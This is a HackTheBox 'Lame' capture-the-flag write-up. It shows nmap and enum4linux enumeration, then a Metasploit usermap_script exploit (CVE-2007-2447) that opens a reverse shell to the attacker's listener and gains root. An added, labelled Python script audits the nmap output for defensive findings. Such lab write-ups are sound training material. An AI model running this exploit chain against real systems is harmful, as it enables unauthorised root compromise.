This is my first CTF write-up, so I wanted to start with an easy one. This is the retired machine from hackthebox.eu called "Lame". Let's jump right into it.
-----
Enumeration
I’ll start with a couple of nmap scans against the target. First, all TCP ports:
root@kali:~/htb/lame# nmap -sC -sV -oA nmap/tcp -vv -p- 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-07 21:19 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:19
...
PORT     STATE SERVICE     REASON         VERSION
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
| ssh-dss
...
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 3h57m42s, deviation: 0s, median: 3h57m42s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 59488/tcp): CLEAN (Timeout)
|   Check 2 (port 29535/tcp): CLEAN (Timeout)
|   Check 3 (port 60839/udp): CLEAN (Timeout)
|   Check 4 (port 40169/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-04-07T21:18:55-04:00
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.18 seconds
           Raw packets sent: 131149 (5.771MB) | Rcvd: 87 (3.812KB)
Next, the top 1000 UDP ports:
root@kali:~/htb/lame# nmap -sU --top-ports 1000 -oA nmap/udp -vv 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-07 21:29 EDT
Initiating Ping Scan at 21:29
Scanning 10.10.10.3 [4 ports]
...
PORT    STATE  SERVICE      REASON
22/udp  closed ssh          port-unreach ttl 63
139/udp closed netbios-ssn  port-unreach ttl 63
445/udp closed microsoft-ds port-unreach ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 9.81 seconds
           Raw packets sent: 2003 (57.978KB) | Rcvd: 6 (308B)
SMB is open and can be a great source of information, so let’s throw enum4linux at the box and see what it comes up with.
root@kali:~/htb/lame# enum4linux -a 10.10.10.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr  7 21:35:31 2019

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.3
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==================================================
|    Enumerating Workgroup/Domain on 10.10.10.3    |
 ==================================================
[E] Can't find workgroup/domain

 ==========================================
|    Nbtstat Information for 10.10.10.3    |
 ==========================================
Looking up status of 10.10.10.3
No reply from 10.10.10.3

 ===================================
|    Session Check on 10.10.10.3    |
 ===================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.3 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

 =========================================
|    Getting domain SID for 10.10.10.3    |
 =========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================
|    OS information on 10.10.10.3    |
 ====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.3 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.3 from srvinfo:
        LAME           Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian)
        platform_id     :       500
        os version      :       4.9
        server type     :       0x9a03

 ===========================
|    Users on 10.10.10.3    |
 ===========================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
...
user:[uucp] rid:[0x3fc]

 =======================================
|    Share Enumeration on 10.10.10.3    |
 =======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

[+] Attempting to map shares on 10.10.10.3
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/print$     Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/tmp        Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/opt        Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/IPC$       [E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/ADMIN$     Mapping: DENIED, Listing: N/A

 ==================================================
|    Password Policy Information for 10.10.10.3    |
 ==================================================
[+] Attaching to 10.10.10.3 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
        [+] LAME
        [+] Builtin
[+] Password Info for Domain: LAME
        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: Not Set
        [+] Password Complexity Flags: 000000
                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0
        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0

 ============================
|    Groups on 10.10.10.3    |
 ============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting builtin groups:
[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
[+] Getting local groups:
[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.
[+] Getting domain groups:
[+] Getting domain group memberships:

 =====================================================================
|    Users on 10.10.10.3 via RID cycling (RIDS: 500-550,1000-1050)    |
 =====================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.

 ===========================================
|    Getting printer info for 10.10.10.3    |
 ===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
No printers returned.

enum4linux complete on Sun Apr  7 21:37:59 2019
We see that nmap and enum4linux both detect the Samba version as “Samba 3.0.20-Debian”. I’ll note this as it could be useful for a quick pwn later and continue with enumeration.
Nmap also detected FTP open with anonymous login allowed, so I’ll use FileZilla to see if I can browse the FTP server. I didn’t find any files, but we have the FTP version, “vsFTPd 2.3.4”.
I see that port 3632 is open and nmap lists it as distcc, but I’m not familiar with this service. Off to Google for a little reading.
After some brief research, I’ve found that distcc is used for distributed C compilation. It isn’t something that is enabled by default, so it is definitely worth looking into to see if it is exploitable.
Nmap detected Ubuntu 4.2.4-1ubuntu4 when checking the service. This looks like the gcc version, so I’m going to go back to Google to find the corresponding Ubuntu version.
It looks like this is Ubuntu 8.04 Hardy.
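As an added example (not part of the original write-up), here is a small Python audit that reads nmap normal output like the scan above and flags what a defender would act on: legacy service versions, anonymous FTP, an SMB1-only server and an exposed distcc daemon. The sample lines are constructed from the scan output on this page; the rule list and the findings text are my own assumptions.

```python
import re

# Constructed sample: the port table and NSE lines from the scan above.
NMAP_OUTPUT = """\
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Host script results:
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
"""
# Port line: "<port>/<proto> open <service> [syn-ack ttl N] <version>"; reason is optional.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(?:syn-ack\s+ttl\s+\d+\s+)?(.*)$")
# Version rules (assumed list): Samba 3.0.20 is the CVE-2007-2447 target used in the post.
VERSION_RULES = [
    (re.compile(r"Samba smbd 3\.0\.20"), "Samba 3.0.20: CVE-2007-2447 (usermap_script), upgrade"),
    (re.compile(r"vsftpd 2\.3\.4"), "vsftpd 2.3.4: outdated release, upgrade"),
    (re.compile(r"OpenSSH 4\.7"), "OpenSSH 4.7p1: outdated release, upgrade"),
]
# Services that should never be reachable from untrusted networks.
EXPOSURE_RULES = {"distccd": "distcc exposed: restrict with distccd --allow or a firewall"}
# NSE script output that is itself a finding, attached to the port it follows.
SCRIPT_RULES = [
    ("Anonymous FTP login allowed", "anonymous FTP enabled: disable unless intended"),
    ("Couldn't establish a SMBv2 connection", "SMB1-only server: no SMB2/3 negotiated"),
]

def audit(nmap_text):
    """Return (port, finding) pairs; NSE lines attach to the preceding port,
    and lines after 'Host script results:' attach to 'host'."""
    findings, current_port = [], "host"
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current_port, service, version = f"{m[1]}/{m[2]}", m[3], m[4]
            if service in EXPOSURE_RULES:
                findings.append((current_port, EXPOSURE_RULES[service]))
            for rule, text in VERSION_RULES:
                if rule.search(version):
                    findings.append((current_port, text))
        elif line.startswith("Host script results"):
            current_port = "host"
        elif line.startswith("|"):
            for needle, text in SCRIPT_RULES:
                if needle in line:
                    findings.append((current_port, text))
    return findings

if __name__ == "__main__":
    for port, finding in audit(NMAP_OUTPUT):
        print(f"{port:>9}  {finding}")
```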
Exploit
We now know the OS version and multiple service versions that are running on the target device. Let’s go back to Google again to see what we can find. That version of Samba looks very old and probably has a remote code execution vulnerability, so I’ll start there.
The first search result from rapid7 details a Metasploit module for the exact version of SMB running on our target. Sounds promising, so I’ll fire up Metasploit and give it a try.
root@kali:/mnt/hgfs/htb/lame# msfconsole
[-] * Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
       =[ metasploit v5.0.4-dev                          ]
+ -- --=[ 1852 exploits - 1047 auxiliary - 325 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 10.10.14.15:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo KVAoHQWMq0RqJYHX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "KVAoHQWMq0RqJYHX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.3:38912) at 2019-04-07 22:22:05 -0400
At this point, we don't get a visible prompt returned, but a quick 'ifconfig' shows that we are connected to our target.
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:50:56:b2:4d:ba
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb2:4dba/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb2:4dba/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:612 errors:0 dropped:0 overruns:0 frame:0
          TX packets:185 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:79638 (77.7 KB)  TX bytes:20057 (19.5 KB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:605 errors:0 dropped:0 overruns:0 frame:0
          TX packets:605 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:275873 (269.4 KB)  TX bytes:275873 (269.4 KB)

whoami
root
id
uid=0(root) gid=0(root)
And there we have it! “Lame” was quickly rooted using the vulnerability detailed in CVE-2007-2447 and a very reliable Metasploit module. I briefly tested distcc on port 3632 and it is exploitable as well, but you do not get root. Stay tuned for another post where I exploit distcc and then attempt privilege escalation.
Hit me up in the comments or by email if you have any questions or suggestions.
Peace,
TK